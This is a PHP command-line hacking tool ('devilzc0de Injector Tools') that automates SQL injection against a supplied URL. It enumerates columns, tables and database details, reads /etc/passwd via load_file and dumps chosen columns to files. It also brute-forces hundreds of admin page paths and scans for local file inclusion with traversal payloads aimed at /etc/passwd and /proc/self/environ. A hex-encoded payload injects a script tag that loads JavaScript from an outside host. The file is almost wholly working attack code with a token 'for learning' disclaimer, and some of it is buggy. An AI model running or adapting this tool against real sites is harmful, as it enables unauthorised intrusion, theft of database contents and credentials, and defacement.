Код:
<?php
/*
Injection Tools Kit's version 1.1
Created By wenkhairu@gmail.com
This is just for learning and fun
Use this with your own risk
Thanks To whitehat,petimati, chaer_newbe
All devilzc0de Crew, All Jasakom Crew
All Whitecyber Crew
+-----------------------------------------------------------------+
| Speecial Thanks For My Love, Fitriana Damayanti I Love You Ever |
+-----------------------------------------------------------------+
*/
set_time_limit (0);
ini_set("memory_limit","1000M");
error_reporting(E_ALL & ~E_NOTICE);
class SuntikSql
{
/* Menggunakan Fungsi Curl */
function koneksi($host)
{
$kon=curl_init($host);
curl_setopt($kon, CURLOPT_PROXY, $proxy);
curl_setopt($kon, CURLOPT_PROXYPORT, $port);
curl_setopt($kon, CURLOPT_RETURNTRANSFER, true);
curl_setopt($kon, CURLOPT_TIMEOUT, 200);
curl_setopt($kon, CURLOPT_HEADER, 1);
curl_setopt($kon, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($kon, CURLOPT_REFERER, "http://google.com");
curl_setopt($kon, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9; Mozilla Firefox');
$halaman = curl_exec($kon);
if($halaman){
return $halaman;
} else {
return false;
}
}
/* Mencari Informasi HTTP HEADER Situs Target */
function informasi($situs)
{
if ($info=$this->koneksi($situs))
{
$ip=parse_url($situs);
echo "[+] IP : ".gethostbyname($ip['host'])."\n";
preg_match("/Content-Type:(.+)/", $info, $type);
preg_match("/Server:(.+)/", $info, $server);
preg_match("/Cache-Control:(.+)/", $info, $cache);
preg_match("/Pragma:(.+)/", $info, $pragma);
preg_match("/Connection:(.+)/", $info, $connection);
preg_match("/Date:(.+)/", $info, $date);
preg_match("/Expires:(.+)/", $info, $expires);
echo "[+] $type[0]\n";
echo "[+] $server[0]\n";
echo "[+] $cache[0]\n";
echo "[+] $date[0]\n";
echo "[+] $expires[0]\n";
echo "[+] $pragma[0]\n";
}
else
{
echo "[+] Ga Bisa di injek\n";
die();
}
}
/* Fungsi SQL injection */
function injeksi($target,$akhir)
{
echo "[+] Target $target\n";
if($this->koneksi($target))
{
echo"[+] Koneksi Ke Target Berhasil !!\n";
echo $this->informasi($target);
$this->cariKolom($target,$akhir);
}
else
{
echo "[+] Koneksi Ke Target Gagal ..!!\n";
}
}
/* Fungsi Mencari Kolom Yang Bisa Di injek*/
function cariKolom($target,$akhir)
{
$batas=100;
$stop=0;
$urlx=$target;
for ($i=0;$i<=$batas;$i++)
{
$kata.= "concat(0x736572616e67,0x3a,".str_repeat($i,1).",0x3a),";
$sql = str_replace("serang", "1+AND+1=2+UNION+ALL+SELECT+".rtrim($kata,",")."+$akhir", $target);
if(preg_match("/serang:(.*?):/i", $this->koneksi($sql), $hasil))
{
echo"[+] Jumlah Kolom ditemukan $i \n";
echo"[+] Kolom Yang bisa di injek $hasil[1]\n";
for($a = 0; $a <= $i; $a++)
{
$kol.="$a,";
if($a == $hasil[1])
{
$kol = str_replace($hasil[1], "serang", $kol);
}
}
$akhir_url = str_replace("serang", "1+AND+1=2+UNION+ALL+SELECT+".rtrim($kol,",")."+$akhir", $urlx);
$exploit="(0x3c736372697074207372633d22687474703a2f2f746f6f6c2e77656e6b68616972752d6d616d65742e636f6d2f646576696c7a633064652e6a73223e3c2f7363726970743e)";
$dump=str_replace("serang",$exploit,$akhir_url);
echo "[+] Injection URL $akhir_url\n";
$this->simpan_hasil('devilzc0deLog.txt',"[!] URL Injeksi = ".$akhir_url."\r\n");
print ("[!] selesai, lanjutkan mencari tabel dan kolom ? y/n ");
fwrite(STDOUT," : ");
$jwb=trim(fgets(STDIN));
if($jwb=="y" || "Y")
$this->server_info($akhir_url);
else
$this->mulai();
}
}
}
/* Fungsi String Ke Hexa Untuk Keperluan Merubah nama tabel */
function HexValue($fitri)
{
for($i = 0; $i < strlen($fitri); $i++)
{
$a .= dechex(ord($fitri[$i]));
}
return $a;
}
/* Fungsi Mencari Versi server, Nama Database, User Database Server */
function server_info($url)
{
/* Variable Array Jika Mysql Server Versi 4 */
$versi_4_tabel=array('tbladmins','sort','_wfspro_admin');
$versi_4_kolom=array('user','username','password','passwd');
$serv_info=array('User'=>'user()','Database'=>'database()','Version'=>'version()');
$khairu=$url;
$aqsara=$url;
$fitri=$url;
$wenkhairu="--";
foreach ($serv_info as $ambil => $hasilnya)
{
if(preg_match("/serang:(.*?):serang/", $this->koneksi("".str_replace("serang", "".$string."+concat(0x736572616e67,0x3a,$hasilnya,0x3a,0x736572616e67)+", $url).""), $dapet))
{
echo "[+] $ambil : $dapet[1]\n";
$this->simpan_hasil('devilzc0deLog.txt',"$ambil : $dapet[1]\n");
}
}
$load = str_replace("serang", "".$string."load_file(0x2f6574632f706173737764)", $khairu);
if(preg_match("/root:x:/", $this->koneksi($load)))
{
echo "[+] Load File Berhasil\n";
echo "[+] URL : $load<br/>";
}
else
{
echo"[+] Load File Tidak Berhasil\n";
}
if(preg_match("/serang:5.(.*?):serang/", $this->koneksi("".str_replace("serang", "concat(0x736572616e67,0x3a,version(),0x3a,0x736572616e67)", $url).""), $dapet))
{
$url = str_replace("serang", "concat(char(114,48,120,58),count(table_name),char(58,114,48,120))", $url);
$url = str_replace($wenkhairu, "+from+information_schema.tables+where+table_schema=database()+$wenkhairu", $url);
if(preg_match("/r0x:(.*?):r0x/", $this->koneksi($url), $totaltbl))
{
echo"[+] Jumlah Total Tabel $totaltbl[1]\n";
$this->simpan_hasil('devilzc0deLog.txt',"[!] Jumlah Total Tabel : $totaltbl[1]\n");
for($i = 0; $i <= $totaltbl[1]; $i++)
{
if(preg_match("/r0x:(.*?):r0x/", $this->koneksi(str_replace(array("serang", "$wenkhairu"), array("concat(char(114,48,120,58),table_name,char(58,114,48,120))", "+from+information_schema.tables+where+table_schema=database()+limit+".$i.",1+$wenkhairu"), $aqsara)),$nama_tabel))
{
echo"[+] Tabel : $nama_tabel[1]\n";
$this->simpan_hasil('devilzc0deLog.txt',"[!] Tabel : $nama_tabel[1]\n");
if(preg_match("/r0x:(.*?):r0x/", $this->koneksi(str_replace(array("serang", "$wenkhairu"), array("concat(char(114,48,120,58),count(column_name),char(58,114,48,120))", "+from+information_schema.columns+where+table_name=0x".$this->HexValue($nama_tabel[1])."+$wenkhairu"), $aqsara)), $totalclm))
{
echo "[+] Jumlah Total Kolom Pada $nama_tabel[1] : $totalclm[1]\n";
$this->simpan_hasil('devilzc0deLog.txt',"[!] Jumlah Total Kolom Pada $nama_tabel[1] : $totalclm[1]\n");
for($a = 0; $a <= $totalclm[1]; $a++)
{
if(preg_match("/r0x:(.*?):r0x/", $this->koneksi(str_replace(array("serang", "$wenkhairu"), array("concat(char(114,48,120,58),column_name,char(58,114,48,120))", "+from+information_schema.columns+where+table_name=0x".$this->HexValue($nama_tabel[1])."+limit+".$a.",1+$wenkhairu"), $fitri)), $nama_kolom))
{
echo" $nama_kolom[1]\n";
$this->simpan_hasil('devilzc0deLog.txt',"$nama_kolom[1]\n");
}
}
}
}
}
}
echo"\n\r\n";
echo"[+] Cek devilzc0deLog.txt\n\r";
}
}
function mulai()
{
$perintah=array('help','injek','dump','quit','admin','lfi');
$crew="crew";
while(1)
{
fwrite(STDOUT, "\ncrew@devilzc0de $: ");
$devilz = trim(fgets(STDIN));
if ($devilz=='injek')
{
echo"----------------------------------------------------------\n";
echo"Ex : http://target.com/index.php?id=serang\n";
echo"Ex : http://target.com/index.php?id=serang&cat=cat\n";
echo"----------------------------------------------------------\n";
fwrite(STDOUT, "\ncrew@devilzc0de $: URL -> ");
$url = trim(fgets(STDIN));
$y="--";
if (empty($url))
{
echo"[!] Please Deh masukan dulu URL-nya\n";
}
else
{
$this->injeksi($url,$y);
}
}
else
{
if(in_array($devilz,$perintah))
{
$this->$devilz();
}
else
{
echo"[!] Perintah tidak ditemukan, Ketik help untuk bantuan\n";
}
}
}
}
function header()
{
$w.="+------------------------------------------------------------------+\n";
$w.="| .___ .__.__ _______ .___ |\n";
$w.="| __| _/_______ _|__| | ________ ____ \ _ \ __| _/____ |\n";
$w.="| / __ |/ __ \ \/ / | | \___ // ___\/ /_\ \ / __ |/ __ \ |\n";
$w.="|/ /_/ \ ___/\ /| | |__/ /\ \___\ \_/ \/ /_/ \ ___/ |\n";
$w.="|\____ |\___ >\_/ |__|____/_____ \\___ >\_____ /\____ |\___ > |\n";
$w.="| \/ \/ \/ \/ \/ \/ \/ |\n";
$w.="|------------------------------------------------------------------|\n";
$w.="| wenkhairu@gmail.com |\n";
$w.="| devilzc0de Injector Tools |\n";
$w.="| Yogyakarta Indonesia December 2010 |\n";
$w.="| Special Thanks For Fitriana Damayanti |\n";
$w.="| Thanks for Loving Me :) |\n";
$w.="| Ketik help untuk bantuan |\n";
$w.="+------------------------------------------------------------------+\n";
echo $w;
}
function help()
{
$bantuan.="Bantuan Perintah untuk devilzc0de injector\n";
$bantuan.="Pastikan CURL aktif di php.ini\n";
$bantuan.=" help : - Pusat Bantuan\n";
$bantuan.=" injek : - Injeksi Situs yang terkena SQl injection\n";
$bantuan.=" dump : - Dump hasil Ijeksi\n";
$bantuan.=" quit : - Keluar dari program\n";
$bantuan.=" admin : - Cari Halaman admin\n";
$bantuan.=" lfi : - Local file inlcution scanner\n";
echo $bantuan;
}
function quit()
{
echo"[+] Terimakasih, semoga bermanfaat\n";
echo"[+] Saran dan kritik di Tunggu ya :)\n";
echo"[+] loading .......";
sleep(3);
exit;
}
function simpan_hasil($fname = '', $fitri = '')
{
$file = @fopen(dirname(__FILE__).'/'.$fname.'', 'a');
$tulis = @fwrite($file, $fitri, '60000000');
if ($tulis)
{
return 1;
}
else
{
return 0;
}
}
function admin()
{
fwrite(STDOUT, "\ncrew@devilzc0de $: URL -> ");
$url = trim(fgets(STDIN));
if(empty($url))
{
echo"[!] Please Deh masukan dulu URL-nya\n";
}
else
{
$hal_admin=array("WebMin","Admin","WebAdmin","adminssion/","pma/","phpbb/admin/","phpbb3/admin/admin.php","phpbb3/admin/","adminpage/","pageadmin/","forums/admin.aspx","forums/admin.php","forums/admin.asp","forum/admin.aspx","forum/admin.php","forum/admin.asp","blogs/wp-admin/","blog/wp-admin/","admin.asp","admin.aspx","cpanel/","wp-admin/","phpmyadmin/","admin.php","admin/","administrator/","moderator/","webadmin/","adminarea/","bb-admin/","adminLogin/","admin_area/","panel-administracion/","instadmin/","memberadmin/","administratorlogin/","adm/","admin/account.php","admin/index.php","admin/login.php","admin/admin.php","admin/account.php","joomla/administrator","login.php","admin_area/admin.php","admin_area/login.php","siteadmin/login.php","siteadmin/index.php","siteadmin/login.html","admin/account.html","admin/index.html","admin/login.html","admin/admin.html","admin_area/index.php","bb-admin/index.php","bb-admin/login.php","bb-admin/admin.php","admin/home.php","admin_area/login.html","admin_area/index.html","admin/controlpanel.php","admincp/index.asp","admincp/login.asp","admincp/index.html","admin/account.html","adminpanel.html","webadmin.html","webadmin/index.html","webadmin/admin.html","webadmin/login.html","admin/admin_login.html","admin_login.html","panel-administracion/login.html","admin/cp.php","cp.php","administrator/index.php","administrator/login.php","nsw/admin/login.php","webadmin/login.php","admin/admin_login.php","admin_login.php","administrator/account.php","administrator.php","admin_area/admin.html","pages/admin/admin-login.php","admin/admin-login.php","admin-login.php","bb-admin/index.html","bb-admin/login.html","bb-admin/admin.html","admin/home.html","modelsearch/login.php","moderator.php","moderator/login.php","moderator/admin.php","account.php","pages/admin/admin-login.html","admin/admin-login.html","admin-login.html","controlpanel.php","admincontrol.php","admin/adminLogin.html","adminLogin.html","admin/adminLogin.html","home.html","rcjakar/admin/login.php","adminarea/index.html","adminarea/admin.html","webadmin.php","webadmin/index.php","webadmin/admin.php","admin/controlpanel.html","admin.html","admin/cp.html","cp.html","adminpanel.php","moderator.html","administrator/index.html","administrator/login.html","user.html","administrator/account.html","administrator.html","login.html","modelsearch/login.html","moderator/login.html","adminarea/login.html","panel-administracion/index.html","panel-administracion/admin.html","modelsearch/index.html","modelsearch/admin.html","admincontrol/login.html","adm/index.html","adm.html","moderator/admin.html","user.php","account.html","controlpanel.html","admincontrol.html","panel-administracion/login.php","wp-login.php","adminLogin.php","admin/adminLogin.php","home.php","adminarea/index.php","adminarea/admin.php","adminarea/login.php","panel-administracion/index.php","panel-administracion/admin.php","modelsearch/index.php","modelsearch/admin.php","admincontrol/login.php","adm/admloginuser.php","admloginuser.php","admin2.php","admin2/login.php","admin2/index.php","adm/index.php","adm.php","affiliate.php","adm_auth.php","memberadmin.php","administratorlogin.php","admin1.php", "admin1.html", "admin2.php", "admin2.html", "yonetim.php", "yonetim.html", "yonetici.php", "yonetici.html", "ccms/", "ccms/login.php", "ccms/index.php", "maintenance/", "webmaster/", "adm/", "configuration/", "configure/", "websvn/", "admin/", "admin/account.php", "admin/account.html". "admin/index.php", "admin/index.html", "admin/login.php". "admin/login.html", "admin/home.php", "admin/controlpanel.html", "admin/controlpanel.php", "admin.php", "admin.html", "admin/cp.php", "admin/cp.html", "cp.php", "cp.html", "administrator/", "administrator/index.html", "administrator/index.php", "administrator/login.html", "administrator/login.php", "administrator/account.html", "administrator/account.php", "administrator.php", "administrator.html", "login.php", "login.html", "modelsearch/login.php", "moderator.php", "moderator.html", "moderator/login.php", "moderator/login.html", "moderator/admin.php", "moderator/admin.html", "moderator/", "account.php", "account.html", "controlpanel/", "controlpanel.php", "controlpanel.html", "admincontrol.php", "admincontrol.html", "adminpanel.php", "adminpanel.html", "admin1.asp", "admin2.asp", "yonetim.asp", "yonetici.asp", "admin/account.asp", "admin/index.asp", "admin/login.asp", "admin/home.asp", "admin/controlpanel.asp", "admin.asp", "admin/cp.asp", "cp.asp", "administrator/index.asp", "administrator/login.asp", "administrator/account.asp", "administrator.asp", "login.asp", "modelsearch/login.asp", "moderator.asp", "moderator/login.asp", "moderator/admin.asp", "account.asp", "controlpanel.asp", "admincontrol.asp", "adminpanel.asp", "fileadmin/", "fileadmin.php", "fileadmin.asp", "fileadmin.html", "administration/", "administration.php", "administration.html", "sysadmin.php", "sysadmin.html", "phpmyadmin/", "myadmin/", "sysadmin.asp", "sysadmin/", "ur-admin.asp", "ur-admin.php", "ur-admin.html", "ur-admin/", "Server.php", "Server.html", "Server.asp", "Server/", "wp-admin/", "administr8.php", "administr8.html", "administr8/", "administr8.asp", "webadmin/", "webadmin.php", "webadmin.asp", "webadmin.html", "administratie/", "admins/", "admins.php", "admins.asp", "admins.html", "administrivia/", "Database_Administration/", "WebAdmin/", "useradmin/", "sysadmins/", "admin1/", "system-administration/", "administrators/", "pgadmin/", "directadmin/", "staradmin/", "ServerAdministrator/", "SysAdmin/", "administer/", "LiveUser_Admin/", "sys-admin/", "typo3/", "panel/", "cpanel/", "cPanel/", "cpanel_file/", "platz_login/", "rcLogin/", "blogindex/", "formslogin/", "autologin/", "support_login/", "meta_login/", "manuallogin/", "simpleLogin/", "loginflat/", "utility_login/", "showlogin/", "memlogin/", "members/", "login-redirect/", "sub-login/", "wp-login/", "login1/", "dir-login/", "login_db/", "xlogin/", "smblogin/", "customer_login/", "UserLogin/", "login-us/", "acct_login/", "admin_area/", "bigadmin/", "project-admins/", "phppgadmin/", "pureadmin/", "sql-admin/", "radmind/", "openvpnadmin/", "wizmysqladmin/", "vadmind/", "ezsqliteadmin/", "hpwebjetadmin/", "newsadmin/", "adminpro/", "Lotus_Domino_Admin/", "bbadmin/", "vmailadmin/", "Indy_admin/", "ccp14admin/", "irc-macadmin/", "banneradmin/", "sshadmin/", "phpldapadmin/", "macadmin/", "administratoraccounts/", "admin4_account/", "admin4_colon/", "radmind-1/", "Super-Admin/", "AdminTools/", "cmsadmin/", "SysAdmin2/", "globes_admin/", "cadmins/", "phpSQLiteAdmin/", "navSiteAdmin/", "server_admin_small/", "logo_sysadmin/", "server/", "database_administration/", "power_user/", "system_administration/", "ss_vms_admin_sm/","admincp/index.asp","panel-administracion/login.html","admin_login.php","admin-login.php","pages/admin/admin-login.html","adminLogin.html","adminarea/admin.html","adminarea/login.html","modelsearch/index.html","panel-administracion/login.php","adminarea/index.php","panel-administracion/admin.php","adm.php","adminarea/","bb-admin/","adminLogin/","panel-administracion/","instadmin/","memberadmin/","administratorlogin/","admin/admin.asp","admin_area/admin.asp","admin_area/login.asp","admin/account.html","admin/login.html","admin/admin.html","admin_area/admin.html","admin_area/login.html","admin_area/index.html","admin_area/index.asp","bb-admin/index.asp","bb-admin/login.asp","bb-admin/admin.asp","bb-admin/index.html","bb-admin/login.html","bb-admin/admin.html","admin/home.html","modelsearch/login.html","admin_login.html","pages/admin/admin-login.asp","admin/admin-login.asp","admin-login.asp","admin/account.html","admin/admin-login.html","webadmin/index.html","webadmin/admin.html","webadmin/login.html","user.asp","user.html","admincp/login.asp","admincp/index.html","admin/adminLogin.html","admin/adminLogin.html","home.html","adminarea/index.html","panel-administracion/index.html","panel-administracion/admin.html","modelsearch/admin.html","admin/admin_login.html","admincontrol/login.html","adm/index.html","adm.html","webadmin/index.asp","webadmin/admin.asp","webadmin/login.asp","admin/admin_login.asp","admin_login.asp","panel-administracion/login.asp","adminLogin.asp","admin/adminLogin.asp","home.asp","adminarea/index.asp","adminarea/admin.asp","adminarea/login.asp","admin-login.html","panel-administracion/index.asp","panel-administracion/admin.asp","modelsearch/index.asp","modelsearch/admin.asp","admincontrol/login.asp","adm/admloginuser.asp","admloginuser.asp","admin2/login.asp","admin2/index.asp","adm/index.asp","adm.asp","affiliate.asp","adm_auth.asp","memberadmin.asp","administratorlogin.asp","siteadmin/login.asp","siteadmin/index.asp","siteadmin/login.html");
foreach($hal_admin as $admn)
{
if(preg_match("/200 OK/", $this->koneksi($url."/".$admn)))
{
echo"\n\r\n";
echo "[+] Halaman Admin Ditemukan [ $url/$admn ]";
echo"\n\r\n";
}
}
}
}
function dump()
{
fwrite(STDOUT, "\ncrew@devilzc0de $: URL -> ");
$url = trim(fgets(STDIN));
fwrite(STDOUT, "\ncrew@devilzc0de $: TABEL -> ");
$tbl = trim(fgets(STDIN));
fwrite(STDOUT, "\ncrew@devilzc0de $: KOLOM -> ");
$kol = trim(fgets(STDIN));
$kol=str_replace(",",",0x3a,",$kol);
$url=str_replace("serang","concat(char(114,48,120,58),group_concat(".$kol."),char(58,114,48,120))",$url);
$url=str_replace("+--","",$url);
$akhir="--";
$f="+from+".$tbl."+".$akhir."";
$url=$url."".$f;
if(preg_match("/r0x:(.*?):r0x/",$this->koneksi($url),$hasil))
{
print "\n".$hasil=str_replace(",","\n",$hasil[1])."\n\n";
$this->simpan_hasil('dump_'.$tbl.'.txt',"$hasil\n");
}
}
function lfi()
{
print ("Ex: http://vixtom.com/index.php?p=\n");
fwrite(STDOUT, "\ncrew@devilzc0de $: URL -> ");
$url = trim(fgets(STDIN));
$list=array('/etc/passwd',
'../etc/passwd',
'../../etc/passwd',
'../../../etc/passwd',
'../../../../etc/passwd',
'../../../../../etc/passwd',
'../../../../../../etc/passwd',
'../../../../../../../etc/passwd',
'../../../../../../../../etc/passwd',
'../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../etc/passwd',
'../etc/passwd%00',
'../../etc/passwd%00',
'../../../etc/passwd%00',
'../../../../etc/passwd%00',
'../../../../../etc/passwd%00',
'../../../../../../etc/passwd%00',
'../../../../../../../etc/passwd%00',
'../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../etc/passwd%00',
'..%2Fetc..%2Fpasswd',
'..%2F..%2Fetc%2Fpasswd',
'..%2F..%2F..%2Fetc%2Fpasswd',
'..%2F..%2F..%2F..%2Fetc%2Fpasswd',
'..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd',
'..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd',
'..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd',
'..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd',
'..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd',
'..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd',
'..%2Fetc%2Fpasswd%00',
'..%2F..%2Fetc%2Fpasswd%00',
'..%2F..%2F..%2Fetc%2Fpasswd%00',
'..%2F..%2F..%2F..%2Fetc%2Fpasswd%00',
'..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00',
'..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00',
'..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00',
'..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00',
'..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00');
$self_env=array('/proc/self/environ',
'../proc/self/environ',
'../../proc/self/environ',
'../../../proc/self/environ'.
'../../../../proc/self/environ',
'../../../../../proc/self/environ',
'../../../../../../proc/self/environ',
'../../../../../../../proc/self/environ',
'../../../../../../../../proc/self/environ',
'../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../proc/self/environ',
'/proc/self/environ',
'../proc/self/environ%00',
'../../proc/self/environ%00',
'../../../proc/self/environ%00'.
'../../../../proc/self/environ%00',
'../../../../../proc/self/environ%00',
'../../../../../../proc/self/environ%00',
'../../../../../../../proc/self/environ%00',
'../../../../../../../../proc/self/environ%00',
'../../../../../../../../../proc/self/environ%00',
'../../../../../../../../../../../proc/self/environ%00',
'..%2Fproc%2Fself%2Fenviron',
'..%2F..%2Fproc%2Fself%2Fenviron',
'..%2F..%2F..%2Fproc%2Fself%2Fenviron'.
'..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron',
'..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron',
'..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron',
'..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron',
'..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron',
'..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron',
'..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron',
'%2Fproc%2Fself%2Fenviron',
'..%2Fproc%2Fself%2Fenviron%00',
'..%2F..%2Fproc%2Fself%2Fenviron%00',
'..%2F..%2F..%2Fproc%2Fself%2Fenviron%00'.
'..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00',
'..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00',
'..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00',
'..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00',
'..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00',
'..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00',
'..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00');
if ($this->koneksi($url))
{
echo"[!] Koneksi Berhasil\n";
$this->informasi($url);
foreach($list as $lfiLink)
{
if(preg_match("/root:x:/", $this->koneksi($url."".$lfiLink)))
{
echo"[!] W00t w00t LFI ditemukan $url$lfiLink \n\n";
print"[+] Apakah mau dilanjutkan untuk memeriksa /proc/self/environ?";
fwrite(STDOUT,": ");
$pilihan=trim(fgets(STDIN));
if($pilihan='y' || $piliahn ='Y')
{
foreach($self_env as $self)
{
if(preg_match("/DOCUMENT_ROOT=/", $this->koneksi($url."".$self)))
{
echo"[!] W00t w00t /proc/self/environ ditemukan $url$self \n\n";
$this->mulai();
}
else
{
echo"[!] $url$self -> !NO\n";
}
}
}
else
{
$this->mulai();
}
}
else
{
echo"[!] $url$lfiLink -> tidak ditemukan\n";
}
}
}
}
}
/*
+----------------------------------------------+
Deklarasi Class untuk penggunaan
+----------------------------------------------+
*/
$wen=new SuntikSql;
$wen->header();
$wen->mulai();
?>
